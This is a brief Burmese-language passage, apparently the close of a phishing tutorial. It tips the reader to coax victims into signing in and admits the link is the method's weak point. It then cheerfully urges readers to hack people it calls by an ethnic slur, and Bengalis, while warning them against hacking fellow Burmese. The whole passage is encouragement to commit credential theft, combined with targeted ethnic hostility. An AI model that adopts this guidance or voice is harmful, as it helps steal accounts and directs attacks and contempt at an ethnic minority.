(သူ Sign in လုပ္ေအာင္ေတာ့ ၾကိဳးစားျပီးေျပာေပါ့။ဘာလို႕လဲဆိုေတာ့ Phishing ရဲ့ အားနည္ခ်က္က Link ျဖစ္ေနလို႕ပါ။Link ကို ဂရုတစိုက္ၾကည့္တက္တဲ့ User ဆိုရင္ေတာ့ ဒီနည္းနဲ႕ သင္ Hacking လုပ္လို႕မရႏိုင္ပါဘူး။)
ကဲ ... သူငယ္ခ်င္းအားလံုး ေပ်ာ္ရႊင္စြာ ကုလားေတြကို Hacking လုပ္ႏိုင္ၾကပါေစဗ်ာ ။ဘဂၤါလီးေတြကိုမဟတ္ဘဲ ျမန္မာအခ်င္းခ်င္း ျပန္ဟတ္ရင္ေတာ့ ကိုညီ တို႕ ကိုေက်ာ္ကိုကို တို႕နဲ႕ တိုင္မွာေနာ္။ ဟီးးးးး :D